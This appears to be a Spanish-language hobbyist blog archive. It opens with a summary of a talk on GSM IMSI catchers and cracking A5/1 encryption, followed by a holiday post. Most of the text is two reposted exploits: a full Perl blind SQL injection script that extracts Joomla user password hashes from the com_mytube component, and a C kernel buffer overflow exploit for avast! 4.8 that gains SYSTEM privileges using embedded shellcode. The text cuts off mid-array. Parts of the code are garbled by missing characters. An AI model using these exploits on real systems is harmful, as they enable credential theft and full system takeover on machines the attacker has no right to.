  • Otros teléfonos en China, una vez se habían conectado a OpenBTS cambiaban el nombre de la red, y luego ya no lo cambiaban al correcto a pesar de rearrancarlos completamente.
  • Otra vez por error respondieron con el mensaje utilizado para desactivar los teléfonos robados en lugar de para rechazar a los teléfonos y que no se conectasen a la red, lo cual daba lugar a múltiples estados con diversos estados de irrecuperabildad según los teléfonos (p.e., el iPhone requería desconectar la batería... una operación que en Apple requiere una visita al servicio técnico o desmontarlo totalmente).
Por último, también ha puesto en evidencia que aunque el capturador de IMSIs es una herramienta muy grosera y fácilmente detectable, ningún teléfono dispone de ningún mecanismo para saber que está conectado a un equipo de acceso impostor, y todos ocultan al usuario si debido a un ataque el teléfono está haciendo la llamda sin usar cifrado y por tanto la privacidad está comprometida.

La segunda parte de la charla ha tratado el tema mucho más peliagudo de los ataques pasivos (escuchando únicamente), en el cual se ha explicado cómo es posible descifrar el código de cifrado AS5/1, el que es utilizado en GSM para proteger la privacidad de las llamadas.

La motivación de Karsten para desarrollar este ataque y hacerlo público, es que el cifrado de GSM ha aparecido roto en muchos artículos de seguridad, pero en ninguno se había llegado hasta las últimas consecuencias, haciendo públicas las herramientas para descifrar el algoritmo..

El protocolo de cifrado AS5/1, tiene una clave relativamente pequeña (64 bits, igual que el DES que ya casi nadie usa), lo que lo hace vulnerable a un ataque de precomputación, en el que se calculan todos los resultados de cifrar un determinado dato con cada una de las claves. Lo que hasta ahora impedía hacer este ataque es que el tamaño de la tabla precomputada es de 1 Petabyte (y por tanto difícil de ocultar) y precomputar la tabla llevaría 100.000 años de una CPU moderna. Lo que Karsten ha hecho es encontrar una manera de precomputar las claves más sencilla y de almacenar la tabla de modo más compacto mediante tablas de cadenas arco iris modificadas.

Para la parte de computarlo más rápido, han utilizado tarjetas gráficas, que son muy eficientes para procesos en paralelo, por el cual son capaces de calcular 400 claves a la vez, además han hecho que cada cálculo procese 4 bits de cada vez, con lo que después de todo, sólo han hecho falta 3 meses de computación en 40 ordenadores con tarjetas gráficas Nvidia para completar el resultado. Aunque usando FPGAs podrían hacerlo más rápido, la escasez de buenos programadores de FPGA les ha hecho renunciar a ello.

Para la parte de comprimir los resultados en tablas de arco iris, Karten ha entrado en más detalle técnico, en el que ha explicado que el mecanismo básico de una tabla de cadenas es tomar un punto de entrada, aplicarle el algoritmo con la clave varias veces hasta llegar a un punto que se almacena en la tabla. Cuando se tiene un dato de entrada, se le aplica el mismo algoritmo (en este caso el algoritmo que desde el estado interno produce el texto cifrado) hasta encontrar un punto que se encuentre en la tabla, una vez encontrada la cadena correcta, se parte desde el principio y el dato anterior al resultado escuchado es el estado interno necesario. Esto se ve mejor en este diagrama, procedente de su presentación.



Sobre este algoritmo básico, han aplicado dos mejoras:
  • Por un lado, para no tener que mirar en el disco duro cada vez (el equipo de descifrado tiene de 16 a 32 memorias flash USB para almacenar los datos con una latencia razonable) cada vez que se ejecuta el algoritmo si se ha llegado al final de la cadena, sólo se almacenan como finales de cadena valores específicos (p.e. con la segunda mitad a cero). De este modo, sólo cuando el resultado de una cadena es un valor específico se mira en disco duro.
  • La segunda mejora es el principio de las tablas "arco iris", que es utilizar un algoritmo levemente diferente (en vez de usar siempre K) en cada paso de la cadena, de modo que la posibilidad de que dos cadenas colisionen produciendo el mismo valor disminuye mucho.
En la solución empleada, ambos se combinan para tener un cambio de algoritmo cada vez que se encuentra cada uno de los 32 valores distinguidos coon los últimos 15 bits a cero. Con esto, ya tienen unas tablas que con 2 TB tienen un 99% de probabilidades de descifrar una llamada si se dispone de todas las claves y un 50% si sólo se consiguen las claves más obvias.

El proyecto está en la fase en la que irá progresando rápidamente, a medida que empiezan a probar van descubriendo más tramas que usar para atacar, y a disminuir el tamaño de las tablas.

La asociación GSM, ha publicado una nota de prensa señalando todo lo que les falta al equipo para poder ejecutar el ataque sobre una llamada que use "frequency hopping": hardware para sintonizar las frecuencias y un software para seguir las diferentes frecuencias. Ellos piensan hacerlo con USRP2 (que es capaz de capturar 25 MHz completos) y con openBTS, aunque todavía no lo tienen listo porque capturar 25 MHz genera demasiados datos y hay que filtrarlo.

Por último, la recomendación para mitigar este ataque, es deshabilitar la cifra A5/1 y pasar a la A5/3 (sólo un operador, SFR, ha hecho algo por ahora), que todavía es demasiado compleja para ser atacada (aunque en una , aunque esto no tapa todos los agujeros porque un ataque activo podría permitir capturar pasivamente una llamada realizada con A5/3, luego activar el capturador de IMSI para obligar al teléfono a negociar con A5/1 y esto permitiría recuperar la clave, ya que el teléfono reutiliza secretos entre llamadas consecutivas y averiguar la clave de la segunda llamda permite conocer la de la primera.

miércoles, 30 de diciembre de 2009

Feliz navidad y año nuevo a todos

En esta ocasión, quiero aprovechar para dedicar algunas palabras a ustedes que se toman un tiempo por pasar por este blog a leer algunas líneas y seguir entreteniéndonos en el mundo geek.

Espero que se hayan pasado una feliz navidad en compañía de los suyos, y un feliz año nuevo. Aprovechen estos días para hacer las cosas que no han tenido tiempo y por supuesto descansar disfrutando de las fiestas sanamente acompañados de una rica y saludable tecate.

Vienen nuevos tiempos y muchas oportunidades en este año 2010, pensando positivo quiero compartieles que uno de mis propósitos de éste 2010 es comprar un hosting para un proyecto que tengo hospedado de forma gratuita, además éste año quiero hacerme de un equipo de cómputo nuevo. En lo que a mi carrera se refiere quisiera éste año aprender php y ajax, junto con el desarrollo de algún nuevo proyecto para la web que quizás y llegue a tener éxito.

Bueno, les dejo este video.


viernes, 6 de noviembre de 2009

joomla component com_mytube (user_id) Blind SQL Injection Vulnerability

#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=);

for ($x=1;$x<=32;$x++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;} if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-09-21]

domingo, 30 de agosto de 2009

Avast! 4.8.1335 Professional Local Kernel Buffer Overflow Exploit

#include 
#include
#include
#include
#include
#include

/*
Program : avast! 4.8.1335 Professionnel
Homepage : http://www.avast.com
Discovery : 2009/07/29
Author Contacted : 2009/07/31
Found by : Heurs
This Advisory : Heurs
Contact : heurs@ghostsinthstack.org


//----- Application description


avast! antivirus software represents complete virus protection,
offering full desktop security including a resident shield.
This antivirus is certified by both ICSA Labs and West Coast
Labs Checkmark.

//----- Description of vulnerability

The File System Filter driver is prone to a local kernel buffer overflow.
This vulnerability allows an intruder to gain SYSTEM privileges on a Windows
system from a limited user account.

//----- Proof Of Concept

http://www.sysdream.com/LocalEscalation_Avast.rar

//----- Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Virtualabs


//-----Exploitation

###############################################
Avast Kernel Buffer Overflow Vulnerability
Proof Of Concept...

===> Found : LocalEscalation_Avast.exe : 2676

Shellcode PID Uploaded !
Shellcode Redirect Uploaded !
Shellcode Stack Uploaded !
Connecting... Found !
Handle : 0000001C
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\eleve\Bureau>whoami
SYSTEM
###############################################
*/

char UpdateAswMon [] = {
0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00,
0x00, 0x00, 0x00
};

char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";

int GetPidByName(char * name_Proc) {
PROCESSENTRY32 PEntry;
HANDLE hTool32;

PEntry.dwSize = sizeof(PROCESSENTRY32);
hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hTool32 == INVALID_HANDLE_VALUE) {
printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
getch();
exit(0);
}
if(!Process32First(hTool32, &PEntry)) {
printf("\nError ==> Process32First(hTool32, &PEntry)");
getch();
exit(0);
}
if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
return PEntry.th32ProcessID;
}
//printf( "\n Process : PID\n");
while(Process32Next(hTool32, &PEntry) != 0){
if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
CloseHandle(hTool32);
printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
return PEntry.th32ProcessID;
}
//printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
}
printf("\n%s n'a pas ete trouve.", name_Proc);
getch();
exit(0);
}

void MajShellcode(char * ProcessName){
DWORD ProcessID;
DWORD MagicWord = 0x41414141;
int i;

ProcessID = GetPidByName(ProcessName);
for (i=0; i if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
printf("Shellcode PID Uploaded !\n");
return;
}
}
printf("Shellcode PID NOT Uploaded :\'(\n");
return;
}

void MajRealShellcode(){
int i;
DWORD MagicWord = 0x11111111;

for (i=0; i if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24;
printf("Shellcode Redirect Uploaded !\n");
return;
}
}
printf("Shellcode Redirect NOT Uploaded :\'(\n");
return;
}

int FindStack(){
__asm__(
"mov %eax, %esp\n\t"
"leave\n\t"
"ret\n\t"
);
}

void MajRealStack(){
int i;
DWORD MagicWord = 0x22222222;
DWORD StackLocation = FindStack();

for (i=0; i if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
printf("Shellcode Stack Uploaded !\n");
return;
}
}
printf("Shellcode NOT Uploaded :\'(\n");
return;
}

void AfficherListeFichiers(void) {
HANDLE hFind;
WIN32_FIND_DATAW FindData;
char Dossier[1024];

// Change de dossier
SetCurrentDirectory(Dossier);

// DÈbut de la recherche
hFind=FindFirstFileW(L"*.*", &FindData);
if (hFind!=INVALID_HANDLE_VALUE)
{
// Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom
printf("%ws\n",FindData.cFileName);
// Fichiers suivants
while (FindNextFileW(hFind, &FindData))
{
printf("%ws\n",FindData.cFileName);
}
}
// Fin de la recherche
FindClose(hFind);
}

int __cdecl main(int argc, char* argv[])
{
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD InitVal=0;
char welcome[1024], out[50];
DWORD Crashing []={
0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72,
0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7,
0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8,
0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2,
0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984,
0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
0x32685945, 0x55016b49, 0x994f9293, 0x599f9653,
0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c,
0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10,
0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7,
0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636,
0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec,
0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776,
0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977,
0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd,
0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84,
0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c,
0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069,
